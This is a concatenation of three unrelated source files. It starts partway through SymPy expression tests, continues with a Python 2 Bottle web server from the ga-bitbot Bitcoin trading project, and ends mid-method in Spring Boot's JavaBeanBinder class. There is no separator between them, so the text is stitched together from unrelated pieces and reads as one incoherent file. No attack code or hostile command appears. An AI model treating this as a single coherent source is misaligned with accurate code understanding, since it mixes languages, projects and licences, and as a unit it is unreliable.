    assert (4*a).extract_multiplicatively(2*a) == 2
    assert ((3*a)*(2*a)).extract_multiplicatively(a) == 6*a
def test_is_constant():
    """is_constant detects (non-)dependence on free/bound/absent symbols.

    Bug fix: the first six checks were bare expressions (``... is True``)
    with no ``assert``, so they evaluated and discarded the result without
    testing anything.
    """
    from sympy.solvers.solvers import checksol
    # numeric limits: the bound variable x does not make the Sum variable
    assert Sum(x, (x, 1, 10)).is_constant() is True
    assert Sum(x, (x, 1, n)).is_constant() is False
    assert Sum(x, (x, 1, n)).is_constant(y) is True
    assert Sum(x, (x, 1, n)).is_constant(n) is False
    # x is bound by the summation, so the Sum is constant wrt x
    assert Sum(x, (x, 1, n)).is_constant(x) is True
    eq = a*cos(x)**2 + a*sin(x)**2 - a
    assert eq.is_constant() is True
    assert eq.subs({x: pi, a: 2}) == eq.subs({x: pi, a: 3}) == 0
    assert x.is_constant() is False
    assert x.is_constant(y) is True
    assert checksol(x, x, Sum(x, (x, 1, n))) is False
    assert checksol(x, x, Sum(x, (x, 1, n))) is False
    f = Function('f')
    assert checksol(x, x, f(x)) is False
    p = symbols('p', positive=True)
    assert Pow(x, S(0), evaluate=False).is_constant() is True  # == 1
    assert Pow(S(0), x, evaluate=False).is_constant() is False  # == 0 or 1
    assert Pow(S(0), p, evaluate=False).is_constant() is True  # == 1
    assert (2**x).is_constant() is False
    assert Pow(S(2), S(3), evaluate=False).is_constant() is True
    z1, z2 = symbols('z1 z2', zero=True)
    assert (z1 + 2*z2).is_constant() is True
    assert meter.is_constant() is True
    assert (3*meter).is_constant() is True
    assert (x*meter).is_constant() is False
def test_equals():
    """Expr.equals decides symbolic equality via simplification and numerics."""
    assert (-3 - sqrt(5) + (-sqrt(10)/2 - sqrt(2)/2)**2).equals(0)
    assert (x**2 - 1).equals((x + 1)*(x - 1))
    assert (cos(x)**2 + sin(x)**2).equals(1)
    assert (a*cos(x)**2 + a*sin(x)**2).equals(a)
    r = sqrt(2)
    assert (-1/(r + r*x) + 1/r/(1 + x)).equals(0)
    assert factorial(x + 1).equals((x + 1)*factorial(x))
    assert sqrt(3).equals(2*sqrt(3)) is False
    assert (sqrt(5)*sqrt(3)).equals(sqrt(3)) is False
    assert (sqrt(5) + sqrt(3)).equals(0) is False
    assert (sqrt(5) + pi).equals(0) is False
    assert meter.equals(0) is False
    assert (3*meter**2).equals(0) is False
    eq = -(-1)**(S(3)/4)*6**(S(1)/4) + (-6)**(S(1)/4)*I
    if eq != 0:  # if canonicalization makes this zero, skip the test
        assert eq.equals(0)
    assert sqrt(x).equals(0) is False
    # from integrate(x*sqrt(1 + 2*x), x);
    # diff is zero only when assumptions allow
    i = 2*sqrt(2)*x**(S(5)/2)*(1 + 1/(2*x))**(S(5)/2)/5 + \
        2*sqrt(2)*x**(S(3)/2)*(1 + 1/(2*x))**(S(5)/2)/(-6 - 3/x)
    ans = sqrt(2*x + 1)*(6*x**2 + x - 1)/15
    diff = i - ans
    assert diff.equals(0) is False
    assert diff.subs(x, -S.Half/2) == 7*sqrt(2)/120
    # there are regions for x for which the expression is True, for
    # example, when x < -1/2 or x > 0 the expression is zero
    p = Symbol('p', positive=True)
    assert diff.subs(x, p).equals(0) is True
    assert diff.subs(x, -1).equals(0) is True
    # prove via minimal_polynomial or self-consistency
    eq = sqrt(1 + sqrt(3)) + sqrt(3 + 3*sqrt(3)) - sqrt(10 + 6*sqrt(3))
    assert eq.equals(0)
    q = 3**Rational(1, 3) + 3
    p = expand(q**3)**Rational(1, 3)
    assert (p - q).equals(0)
    # issue 6829
    # eq = q*x + q/4 + x**4 + x**3 + 2*x**2 - S(1)/3
    # z = eq.subs(x, solve(eq, x)[0])
    # the expression below is that substituted root, written out explicitly
    q = symbols('q')
    z = (q*(-sqrt(-2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
        S(13)/12)/2 - sqrt((2*q - S(7)/4)/sqrt(-2*(-(q - S(7)/8)**S(2)/8 -
        S(2197)/13824)**(S(1)/3) - S(13)/12) + 2*(-(q - S(7)/8)**S(2)/8 -
        S(2197)/13824)**(S(1)/3) - S(13)/6)/2 - S(1)/4) + q/4 + (-sqrt(-2*(-(q
        - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) - S(13)/12)/2 - sqrt((2*q
        - S(7)/4)/sqrt(-2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
        S(13)/12) + 2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
        S(13)/6)/2 - S(1)/4)**4 + (-sqrt(-2*(-(q - S(7)/8)**S(2)/8 -
        S(2197)/13824)**(S(1)/3) - S(13)/12)/2 - sqrt((2*q -
        S(7)/4)/sqrt(-2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
        S(13)/12) + 2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
        S(13)/6)/2 - S(1)/4)**3 + 2*(-sqrt(-2*(-(q - S(7)/8)**S(2)/8 -
        S(2197)/13824)**(S(1)/3) - S(13)/12)/2 - sqrt((2*q -
        S(7)/4)/sqrt(-2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
        S(13)/12) + 2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
        S(13)/6)/2 - S(1)/4)**2 - S(1)/3)
    assert z.equals(0)
def test_random():
    """_random returns a sample when possible and None when it cannot evaluate."""
    from sympy import posify, lucas
    assert posify(x)[0]._random() is not None
    assert lucas(n)._random(2, -2, 0, -1, 1) is None
def test_round():
    """Expr.round: precision, negative digits, complex parts and special values."""
    from sympy.abc import x
    assert Float('0.1249999').round(2) == 0.12
    # very large integers round to Floats without losing magnitude
    d20 = 12345678901234567890
    ans = S(d20).round(2)
    assert ans.is_Float and ans == d20
    ans = S(d20).round(-2)
    assert ans.is_Float and ans == 12345678901234567900
    assert S('1/7').round(4) == 0.1429
    assert S('.[12345]').round(4) == 0.1235
    assert S('.1349').round(2) == 0.13
    n = S(12345)
    ans = n.round()
    assert ans.is_Float
    assert ans == n
    ans = n.round(1)
    assert ans.is_Float
    assert ans == n
    ans = n.round(4)
    assert ans.is_Float
    assert ans == n
    # negative digits round to multiples of powers of 10
    assert n.round(-1) == 12350
    r = n.round(-4)
    assert r == 10000
    # in fact, it should equal many values since __eq__
    # compares at equal precision
    assert all(r == i for i in range(9984, 10049))
    assert n.round(-5) == 0
    assert (pi + sqrt(2)).round(2) == 4.56
    assert (10*(pi + sqrt(2))).round(-1) == 50
    # rounding a symbolic expression is an error
    raises(TypeError, lambda: round(x + 2, 2))
    assert S(2.3).round(1) == 2.3
    e = S(12.345).round(2)
    assert e == round(12.345, 2)
    assert type(e) is Float
    assert (Float(.3, 3) + 2*pi).round() == 7
    assert (Float(.3, 3) + 2*pi*100).round() == 629
    assert (Float(.03, 3) + 2*pi/100).round(5) == 0.09283
    assert (Float(.03, 3) + 2*pi/100).round(4) == 0.0928
    assert (pi + 2*E*I).round() == 3 + 5*I
    assert S.Zero.round() == 0
    # precision of the result tracks the requested digits
    a = (Add(1, Float('1.' + '9'*27, ''), evaluate=0))
    assert a.round(10) == Float('3.0000000000', '')
    assert a.round(25) == Float('3.0000000000000000000000000', '')
    assert a.round(26) == Float('3.00000000000000000000000000', '')
    assert a.round(27) == Float('2.999999999999999999999999999', '')
    assert a.round(30) == Float('2.999999999999999999999999999', '')
    raises(TypeError, lambda: x.round())
    # exact magnitude of 10
    assert str(S(1).round()) == '1.'
    assert str(S(100).round()) == '100.'
    # applied to real and imaginary portions
    assert (2*pi + E*I).round() == 6 + 3*I
    assert (2*pi + I/10).round() == 6
    assert (pi/10 + 2*I).round() == 2*I
    # the lhs re and im parts are Float with dps of 2
    # and those on the right have dps of 15 so they won't compare
    # equal unless we use string or compare components (which will
    # then coerce the floats to the same precision) or re-create
    # the floats
    assert str((pi/10 + E*I).round(2)) == '0.31 + 2.72*I'
    assert (pi/10 + E*I).round(2).as_real_imag() == (0.31, 2.72)
    assert (pi/10 + E*I).round(2) == Float(0.31, 2) + I*Float(2.72, 3)
    # issue 6914
    assert (I**(I + 3)).round(3) == Float('-0.208', '')*I
    # issue 7961
    assert str(S(0.006).round(2)) == '0.01'
    assert str(S(0.00106).round(4)) == '0.0011'
    # issue 8147
    assert S.NaN.round() == S.NaN
    assert S.Infinity.round() == S.Infinity
    assert S.NegativeInfinity.round() == S.NegativeInfinity
    assert S.ComplexInfinity.round() == S.ComplexInfinity
def test_round_exception_nostr():
    """round() on a symbol raises without embedding the (slow) str form."""
    # Don't use the string form of the expression in the round exception, as
    # it's too slow
    s = Symbol('bad')
    try:
        s.round()
    except TypeError as e:
        assert 'bad' not in str(e)
    else:
        # Did not raise
        raise AssertionError("Did not raise")
def test_extract_branch_factor():
    """exp_polar(2.0*I*pi) extracts a trivial branch factor of (1, 1)."""
    assert exp_polar(2.0*I*pi).extract_branch_factor() == (1, 1)
def test_identity_removal():
    """make_args drops additive/multiplicative identities from the arg tuple."""
    assert Add.make_args(x + 0) == (x,)
    assert Mul.make_args(x*1) == (x,)
def test_float_0():
    """Float(0.0) participates in arithmetic like zero."""
    assert Float(0.0) + 1 == Float(1.0)
@XFAIL
def test_float_0_fail():
    """Known failure: Float(0.0) is currently absorbed instead of preserved."""
    assert Float(0.0)*x == Float(0.0)
    assert (x + Float(0.0)).is_Add
def test_issue_6325():
    """Second derivative simplification: diff(..., simplify=True) vs False.

    Bug fix: ``e.diff(t, 2) == ans`` was a bare comparison with no
    ``assert`` — it evaluated to a Boolean and was silently discarded.
    """
    ans = (b**2 + z**2 - (b*(a + b*t) + z*(c + t*z))**2/(
        (a + b*t)**2 + (c + t*z)**2))/sqrt((a + b*t)**2 + (c + t*z)**2)
    e = sqrt((a + b*t)**2 + (c + z*t)**2)
    assert diff(e, t, 2) == ans
    assert e.diff(t, 2) == ans
    # without simplification the raw derivative differs from the closed form
    assert diff(e, t, 2, simplify=False) != ans
def test_issue_7426():
    """Mod expressions over different symbols are not structurally equal.

    Bug fix: ``== False`` compared with equality instead of identity; since
    ``equals`` returns a Python bool (or None), ``is False`` is the correct
    and idiomatic check (flake8 E712).
    """
    f1 = a % c
    f2 = x % z
    assert f1.equals(f2) is False
"""
wc_server v0.01
web client server
Copyright 2011 Brian Monkaba
This file is part of ga-bitbot.
ga-bitbot is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
ga-bitbot is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with ga-bitbot. If not, see <http://www.gnu.org/licenses/>.
"""
#
# server provides a web based client interface
#
__appversion__ = "0.01a"
# NOTE: Python 2 source (print statements, xmlrpclib).
print "Genetic Bitcoin Web Client Server v%s"%__appversion__
# connect to the xml server
#
import gene_server_config
import xmlrpclib
import json
import time
import socket
import paths
from bottle import route, run, static_file, redirect
#define the server port
PORT = 8080
# Cross-platform hack to discover the local IP address: "connect" a UDP
# socket to a well-known host (no packet is sent for UDP connect) and read
# this machine's address back from the socket.
# NOTE(review): requires DNS/network to be available at import time.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("www.google.com",80))
ip_address = s.getsockname()[0]
s.close()
__server__ = gene_server_config.__server__
__port__ = str(gene_server_config.__port__)
#make sure the port number matches the server.
# XML-RPC proxy to the gene server; every server.* call below goes over this.
server = xmlrpclib.Server('http://' + __server__ + ":" + __port__)
print "Connected to",__server__,":",__port__
#utility functions
def ppdict(d, nest=0):
    """Pretty-print a (possibly nested) dict as an HTML fragment.

    Each key is rendered bold; nested dicts recurse with one extra
    ``---> `` indentation marker per level. A non-dict argument falls back
    to its plain ``str`` representation.

    Fixes: the bare ``except:`` (which also swallowed KeyboardInterrupt and
    real bugs) is narrowed to the errors a non-mapping actually raises, and
    ``type(...) != type({})`` is replaced with ``isinstance`` so dict
    subclasses are also recursed into.
    """
    output = '<br>' if nest > 0 else ''
    try:
        for key in d.keys():
            if not isinstance(d[key], dict):
                output += "---> "*nest + '<b>' + str(key) + '</b>' + ': ' + str(d[key]) + '<br>'
            else:
                output += '<b>' + str(key) + '</b>' + ':' + ppdict(d[key], nest + 1) + '<br>'
    except (AttributeError, TypeError):
        # d is not dict-like; show it verbatim
        output += str(d)
    return output
#define client functions
@route('/')
def index():
    """Render the system status page from ./report/system.templ.

    Pulls gene-library hashes, active clients, process-monitor data and the
    best genes per quartile from the XML-RPC gene server, then substitutes
    the HTML fragments into the template's {SYS_*} placeholders.
    """
    f = open('./report/system.templ','r')
    template = f.read()
    f.close()
    # gene-definition hash list and the currently selected default
    gdhl = json.loads(server.get_gene_def_hash_list())
    dgdh = json.loads(server.get_default_gene_def_hash())
    pid = 'WC_SERVER'
    server.pid_register_client(pid,dgdh)
    # --- buy-trigger section -------------------------------------------
    trigger = "-"*80 + '<br>'
    trigger += "Current Volitility Quartile: " + str(server.get_active_quartile()) + '<br>'
    trigger += "Buy Order Trigger* @ $"+"%.2f"%json.loads(server.get_target(pid))['buy'] + '<br>' * 2
    trigger += "* Will report $0 if target is too far away from the current price.<br> bcbookie also uses additional logic to screen potential orders.<br>"
    trigger += "-"*80 + '<br>' * 2
    # --- gene library / active clients section -------------------------
    clients = "-"*80 + '<br>'
    clients += "Gene Library (" + str(len(gdhl)) + ')<br>'
    for gdh in gdhl:
        # each hash links to /set_default_db/<hash> to switch the default
        clients += "----><a href='./set_default_db/%s'>"%gdh + gdh + "</a><br>"
        try:
            clients += "-------->" + json.loads(server.get_gene_def(gdh))['name'] + '<br>'
        except:
            # gene def may be missing a 'name'; skip the label silently
            pass
    clients += "Default Gene Def Hash: " + dgdh + '<br>'
    clients += "-"*80 + '<br>' * 2
    clients += "-"*80 + '<br>'
    # clients seen in the last 180 seconds count as active
    pid_list = json.loads(server.pid_list(180))
    clients += "Active Clients (" + str(len(pid_list)) + ')<br>'
    for apid in pid_list:
        clients += "----> "+ apid + '<br>'
    clients += "-"*80 + '<br>' * 2
    # --- process monitor section ---------------------------------------
    pids = json.loads(server.get_pids())
    monitor = "-"*80 + '<br>'
    monitor += "Process monitor info (by PID)" + '<br>'
    monitor += "-"*80 + '<br>'
    monitor += ppdict(pids) + '<br>'*2
    monitor = monitor.replace('\n','<br>')
    # --- best genes per quartile section -------------------------------
    best = "-"*80 + '<br>'
    best += "Highest scoring genes (per quartile)" + '<br>'
    best += "-"*80 + '<br>'
    for quartile in [1,2,3,4]:
        try:
            # genes scored within the last 24 hours for this quartile
            ag = json.loads(server.get(60*60*24,quartile,pid))
        except:
            ag = {"Gene server didn't return a dictionary.":"Gene server didn't return a dictionary."}
        best += "-"*80 + '<br>'
        best += "Quartile: " + str(quartile) + " :: " + str(time.ctime()) + '<br>'
        best += ppdict(ag) + '<br>'
    best = best.replace('\n','<br>')
    # substitute the assembled fragments into the page template
    template = template.replace('{LAST_UPDATE}',time.ctime())
    template = template.replace('{SYS_TRIGGER}',trigger)
    template = template.replace('{SYS_MONITOR}',monitor)
    template = template.replace('{SYS_CLIENTS}',clients)
    template = template.replace('{SYS_BEST_GENES}',best)
    return template
@route('/set_default_db/<db_hash>')
def set_default_db(db_hash = None):
    """Switch the gene server's default gene-definition hash, then go home."""
    server.set_default_gene_def_hash(db_hash)
    return redirect("/")
# Static asset routes. Bug fix: all three handlers were named
# ``server_static`` — each later def shadowed the previous one at module
# level (routes still worked because @route registers before rebinding,
# but introspection/debugging saw only the last). Give each a unique name.
@route('/report/<filepath:path>')
def serve_report(filepath):
    """Serve files from the ./report directory."""
    return static_file(filepath, root='./report')

@route('/img/<filepath:path>')
def serve_img(filepath):
    """Serve image assets from ./report/img."""
    return static_file(filepath, root='./report/img')

@route('/js/<filepath:path>')
def serve_js(filepath):
    """Serve JavaScript assets from ./report/js."""
    return static_file(filepath, root='./report/js')
# Start the bottle HTTP server on the detected LAN address (blocking call).
run(host=ip_address, port=PORT)
# NOTE(review): only reached after the server shuts down, so this banner is
# effectively never printed while serving.
print "http://" + ip_address + ":" + str(PORT)
/*
* Copyright 2012-present the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.springframework.boot.context.properties.bind;
import java.beans.Introspector;
import java.lang.annotation.Annotation;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.lang.reflect.Modifier;
import java.util.Arrays;
import java.util.Comparator;
import java.util.LinkedHashMap;
import java.util.LinkedHashSet;
import java.util.Map;
import java.util.Set;
import java.util.concurrent.ConcurrentHashMap;
import java.util.function.BiConsumer;
import java.util.function.Function;
import java.util.function.Supplier;
import org.jspecify.annotations.Nullable;
import org.springframework.beans.BeanUtils;
import org.springframework.boot.context.properties.bind.Binder.Context;
import org.springframework.boot.context.properties.source.ConfigurationPropertyName;
import org.springframework.boot.context.properties.source.ConfigurationPropertySource;
import org.springframework.boot.context.properties.source.ConfigurationPropertyState;
import org.springframework.core.BridgeMethodResolver;
import org.springframework.core.MethodParameter;
import org.springframework.core.ResolvableType;
import org.springframework.util.Assert;
/**
* {@link DataObjectBinder} for mutable Java Beans.
*
* @author Phillip Webb
* @author Madhura Bhave
* @author Lasse Wulff
*/
class JavaBeanBinder implements DataObjectBinder {

	// Context-cache key under which "does any source have properties below this
	// name?" answers are memoized for the duration of a bind operation.
	private static final String HAS_KNOWN_BINDABLE_PROPERTIES_CACHE = JavaBeanBinder.class.getName()
			+ ".HAS_KNOWN_BINDABLE_PROPERTIES_CACHE";

	static final JavaBeanBinder INSTANCE = new JavaBeanBinder();

	@Override
	public <T> @Nullable T bind(ConfigurationPropertyName name, Bindable<T> target, Context context,
			DataObjectPropertyBinder propertyBinder) {
		// Only consult the existing value supplier when at least one source
		// actually contains descendants of 'name'; otherwise binding is moot.
		boolean hasKnownBindableProperties = target.getValue() != null && hasKnownBindableProperties(name, context);
		Bean<T> bean = Bean.get(target, context, hasKnownBindableProperties);
		if (bean == null) {
			return null;
		}
		BeanSupplier<T> beanSupplier = bean.getSupplier(target);
		boolean bound = bind(propertyBinder, bean, beanSupplier, context);
		// Return the instance only if at least one property was bound.
		return (bound ? beanSupplier.get() : null);
	}

	@Override
	@SuppressWarnings("unchecked")
	public <T> @Nullable T create(Bindable<T> target, Context context) {
		Class<T> type = (Class<T>) target.getType().resolve();
		return (type != null) ? BeanUtils.instantiateClass(type) : null;
	}

	private boolean hasKnownBindableProperties(ConfigurationPropertyName name, Context context) {
		// Memoize per-name answers in the binder context cache.
		Map<ConfigurationPropertyName, Boolean> cache = getHasKnownBindablePropertiesCache(context);
		Boolean hasKnownBindableProperties = cache.get(name);
		if (hasKnownBindableProperties == null) {
			hasKnownBindableProperties = computeHasKnownBindableProperties(name, context);
			cache.put(name, hasKnownBindableProperties);
		}
		return hasKnownBindableProperties;
	}

	private boolean computeHasKnownBindableProperties(ConfigurationPropertyName name, Context context) {
		for (ConfigurationPropertySource source : context.getSources()) {
			if (source.containsDescendantOf(name) == ConfigurationPropertyState.PRESENT) {
				return true;
			}
		}
		return false;
	}

	@SuppressWarnings("unchecked")
	private Map<ConfigurationPropertyName, Boolean> getHasKnownBindablePropertiesCache(Context context) {
		Object cache = context.getCache().get(HAS_KNOWN_BINDABLE_PROPERTIES_CACHE);
		if (cache == null) {
			cache = new ConcurrentHashMap<ConfigurationPropertyName, Boolean>();
			context.getCache().put(HAS_KNOWN_BINDABLE_PROPERTIES_CACHE, cache);
		}
		return (Map<ConfigurationPropertyName, Boolean>) cache;
	}

	private <T> boolean bind(DataObjectPropertyBinder propertyBinder, Bean<T> bean, BeanSupplier<T> beanSupplier,
			Context context) {
		boolean bound = false;
		for (BeanProperty beanProperty : bean.getProperties().values()) {
			bound |= bind(beanSupplier, propertyBinder, beanProperty);
			context.clearConfigurationProperty();
		}
		return bound;
	}

	private <T> boolean bind(BeanSupplier<T> beanSupplier, DataObjectPropertyBinder propertyBinder,
			BeanProperty property) {
		String propertyName = determinePropertyName(property);
		ResolvableType type = property.getType();
		Supplier<Object> value = property.getValue(beanSupplier);
		Annotation[] annotations = property.getAnnotations();
		Object bound = propertyBinder.bindProperty(propertyName,
				Bindable.of(type).withSuppliedValue(value).withAnnotations(annotations));
		if (bound == null) {
			return false;
		}
		if (property.isSettable()) {
			property.setValue(beanSupplier, bound);
		}
		else if (value == null || !bound.equals(value.get())) {
			// A getter-only property whose current value differs from the
			// bound one cannot be applied — fail loudly rather than silently.
			throw new IllegalStateException("No setter found for property: " + property.getName());
		}
		return true;
	}

	private String determinePropertyName(BeanProperty property) {
		// A @Name annotation on the backing field overrides the derived name.
		return Arrays.stream((property.getAnnotations() != null) ? property.getAnnotations() : new Annotation[0])
			.filter((annotation) -> annotation.annotationType() == Name.class)
			.findFirst()
			.map(Name.class::cast)
			.map(Name::value)
			.orElse(property.getName());
	}

	/**
	 * The properties of a bean that may be bound.
	 */
	static class BeanProperties {

		private final Map<String, BeanProperty> properties = new LinkedHashMap<>();

		private final ResolvableType type;

		private final Class<?> resolvedType;

		BeanProperties(ResolvableType type, Class<?> resolvedType) {
			this.type = type;
			this.resolvedType = resolvedType;
			addProperties(resolvedType);
		}

		private void addProperties(Class<?> type) {
			// Walk up the class hierarchy, stopping before Object.
			while (type != null && !Object.class.equals(type)) {
				Method[] declaredMethods = getSorted(type, this::getDeclaredMethods, Method::getName);
				Field[] declaredFields = getSorted(type, Class::getDeclaredFields, Field::getName);
				addProperties(declaredMethods, declaredFields);
				type = type.getSuperclass();
			}
		}

		private Method[] getDeclaredMethods(Class<?> type) {
			Method[] methods = type.getDeclaredMethods();
			// Resolve bridge methods; the Set de-duplicates methods that
			// bridge to the same underlying method.
			Set<Method> result = new LinkedHashSet<>(methods.length);
			for (Method method : methods) {
				result.add(BridgeMethodResolver.findBridgedMethod(method));
			}
			return result.toArray(new Method[0]);
		}

		private <S, E> E[] getSorted(S source, Function<S, E[]> elements, Function<E, String> name) {
			// Sort by name for deterministic property discovery order.
			E[] result = elements.apply(source);
			Arrays.sort(result, Comparator.comparing(name));
			return result;
		}

		protected void addProperties(Method[] declaredMethods, Field[] declaredFields) {
			@Nullable Method[] methods = new Method[declaredMethods.length];
			for (int i = 0; i < declaredMethods.length; i++) {
				methods[i] = isCandidate(declaredMethods[i]) ? declaredMethods[i] : null;
			}
			// "is" getters are added first so a later "get" getter can take
			// precedence (see BeanProperty.addGetter).
			for (Method method : methods) {
				addMethodIfPossible(method, "is", 0, BeanProperty::addGetter);
			}
			for (Method method : methods) {
				addMethodIfPossible(method, "get", 0, BeanProperty::addGetter);
			}
			for (Method method : methods) {
				addMethodIfPossible(method, "set", 1, BeanProperty::addSetter);
			}
			for (Field field : declaredFields) {
				addField(field);
			}
		}

		private boolean isCandidate(Method method) {
			// Exclude non-public-ish, abstract, static, bridge and synthetic
			// ('$' in name) methods as well as Object/Class members.
			int modifiers = method.getModifiers();
			return !Modifier.isPrivate(modifiers) && !Modifier.isProtected(modifiers) && !Modifier.isAbstract(modifiers)
					&& !Modifier.isStatic(modifiers) && !method.isBridge()
					&& !Object.class.equals(method.getDeclaringClass())
					&& !Class.class.equals(method.getDeclaringClass()) && method.getName().indexOf('$') == -1;
		}

		private void addMethodIfPossible(@Nullable Method method, String prefix, int parameterCount,
				BiConsumer<BeanProperty, Method> consumer) {
			if (method != null && method.getParameterCount() == parameterCount && method.getName().startsWith(prefix)
					&& method.getName().length() > prefix.length()) {
				// Strip the prefix and decapitalize to obtain the property name.
				String propertyName = Introspector.decapitalize(method.getName().substring(prefix.length()));
				consumer.accept(this.properties.computeIfAbsent(propertyName, this::getBeanProperty), method);
			}
		}

		private BeanProperty getBeanProperty(String name) {
			return new BeanProperty(name, this.type);
		}

		private void addField(Field field) {
			// Fields only attach to properties already discovered via methods.
			BeanProperty property = this.properties.get(field.getName());
			if (property != null) {
				property.addField(field);
			}
		}

		protected final ResolvableType getType() {
			return this.type;
		}

		protected final Class<?> getResolvedType() {
			return this.resolvedType;
		}

		final Map<String, BeanProperty> getProperties() {
			return this.properties;
		}

		static BeanProperties of(Bindable<?> bindable) {
			ResolvableType type = bindable.getType();
			Class<?> resolvedType = type.resolve(Object.class);
			return new BeanProperties(type, resolvedType);
		}

	}

	/**
	 * The bean being bound.
	 *
	 * @param <T> the bean type
	 */
	static class Bean<T> extends BeanProperties {

		Bean(ResolvableType type, Class<?> resolvedType) {
			super(type, resolvedType);
		}

		@SuppressWarnings("unchecked")
		BeanSupplier<T> getSupplier(Bindable<T> target) {
			// Prefer the existing value; fall back to instantiating the
			// resolved type. Evaluation is deferred via BeanSupplier.
			return new BeanSupplier<>(() -> {
				T instance = null;
				if (target.getValue() != null) {
					instance = target.getValue().get();
				}
				if (instance == null) {
					instance = (T) BeanUtils.instantiateClass(getResolvedType());
				}
				return instance;
			});
		}

		@SuppressWarnings("unchecked")
		static <T> @Nullable Bean<T> get(Bindable<T> bindable, Context context, boolean canCallGetValue) {
			ResolvableType type = bindable.getType();
			Class<?> resolvedType = type.resolve(Object.class);
			Supplier<T> value = bindable.getValue();
			T instance = null;
			if (canCallGetValue && value != null) {
				// Use the runtime class of the existing instance when available.
				instance = value.get();
				resolvedType = (instance != null) ? instance.getClass() : resolvedType;
			}
			if (instance == null && !isInstantiable(resolvedType)) {
				return null;
			}
			// Bean metadata is cached per (declared type, resolved type) pair.
			Map<CacheKey, Bean<?>> cache = getCache(context);
			CacheKey cacheKey = new CacheKey(type, resolvedType);
			Bean<?> bean = cache.get(cacheKey);
			if (bean == null) {
				bean = new Bean<>(type, resolvedType);
				cache.put(cacheKey, bean);
			}
			return (Bean<T>) bean;
		}

		@SuppressWarnings("unchecked")
		private static Map<CacheKey, Bean<?>> getCache(Context context) {
			Map<CacheKey, Bean<?>> cache = (Map<CacheKey, Bean<?>>) context.getCache().get(Bean.class);
			if (cache == null) {
				cache = new ConcurrentHashMap<>();
				context.getCache().put(Bean.class, cache);
			}
			return cache;
		}

		private static boolean isInstantiable(Class<?> type) {
			if (type.isInterface()) {
				return false;
			}
			try {
				// Instantiable here means "has a default constructor".
				type.getDeclaredConstructor();
				return true;
			}
			catch (Exception ex) {
				return false;
			}
		}

		private record CacheKey(ResolvableType type, Class<?> resolvedType) {

		}

	}

	// Lazily creates the bean instance once and then keeps returning it.
	private static class BeanSupplier<T> implements Supplier<T> {

		private final Supplier<T> factory;

		private @Nullable T instance;

		BeanSupplier(Supplier<T> factory) {
			this.factory = factory;
		}

		@Override
		public T get() {
			if (this.instance == null) {
				this.instance = this.factory.get();
			}
			return this.instance;
		}

	}

	/**
	 * A bean property being bound.
	 */
	static class BeanProperty {

		private final String name;

		private final ResolvableType declaringClassType;

		private @Nullable Method getter;

		private @Nullable Method setter;

		private @Nullable Field field;

		BeanProperty(String name, ResolvableType declaringClassType) {
			// Property names are normalized to dashed form for matching.
			this.name = DataObjectPropertyName.toDashedForm(name);
			this.declaringClassType = declaringClassType;
		}

		void addGetter(Method getter) {
			// A "get" accessor replaces a previously registered "is" accessor.
			if (this.getter == null || this.getter.getName().startsWith("is")) {
				this.getter = getter;
			}
		}

		void addSetter(Method setter) {
			if (this.setter == null || isBetterSetter(setter)) {
				this.setter = setter;
			}
		}

		private boolean isBetterSetter(Method setter) {
			// Prefer the setter whose parameter type matches the getter's
			// return type exactly.
			return this.getter != null && this.getter.getReturnType().equals(setter.getParameterTypes()[0]);
		}

		void addField(Field field) {
			if (this.field == null) {
				this.field = field;
			}
		}

		String getName() {
			return this.name;
		}

		ResolvableType getType() {
			// The setter's parameter type wins over the getter's return type.
			if (this.setter != null) {
				MethodParameter methodParameter = new MethodParameter(this.setter, 0);
				return ResolvableType.forMethodParameter(methodParameter, this.declaringClassType);
			}
			Assert.state(this.getter != null, "'getter' must not be null");
			MethodParameter methodParameter = new MethodParameter(this.getter, -1);
			return ResolvableType.forMethodParameter(methodParameter, this.declaringClassType);
		}

		Annotation @Nullable [] getAnnotations() {
			try {
				return (this.field != null) ? this.field.getDeclaredAnnotations() : null;
			}
			catch (Exception ex) {
				return null;
			}
		}

		@Nullable Supplier<Object> getValue(Supplier<?> instance) {
			if (this.getter == null) {
				return null;
			}
			return () -> {
				Assert.state(this.getter != null, "'getter' must not be null");
				try {
					this.getter.setAccessible(true);
					return this.getter.invoke(instance.get());
				}
				catch (Exception ex) {
					// Kotlin lateinit properties throw on uninitialized
					// access; treat that as "no current value".
					if (isUninitializedKotlinProperty(ex)) {
						return null;
					}
					throw new IllegalStateException("Unable to get value for property " + this.name, ex);
				}
			};
		}

		private boolean isUninitializedKotlinProperty(Exception ex) {
			return (ex instanceof InvocationTargetException invocationTargetException)
					&& "kotlin.UninitializedPropertyAccessException"
						.equals(invocationTargetException.getTargetException().getClass().getName());
		}

		boolean isSettable() {
			return this.setter != null;
		}

		void setValue(Supplier<?> instance, Object value) {
			Assert.state(this.setter != null, "'setter' must not be null");
			try {
				this.setter.setAccessible(true);
				this.setter.invoke(instance.get(), value);
			}
			catch (Exception ex) {
				throw new IllegalStateException("Unable to set value for property " + this.name, ex);
			}
		}

		@Nullable Method getGetter() {
			return this.getter;
		}

		@Nullable Method getSetter() {
			return this.setter;
		}

		@Nullable Field getField() {
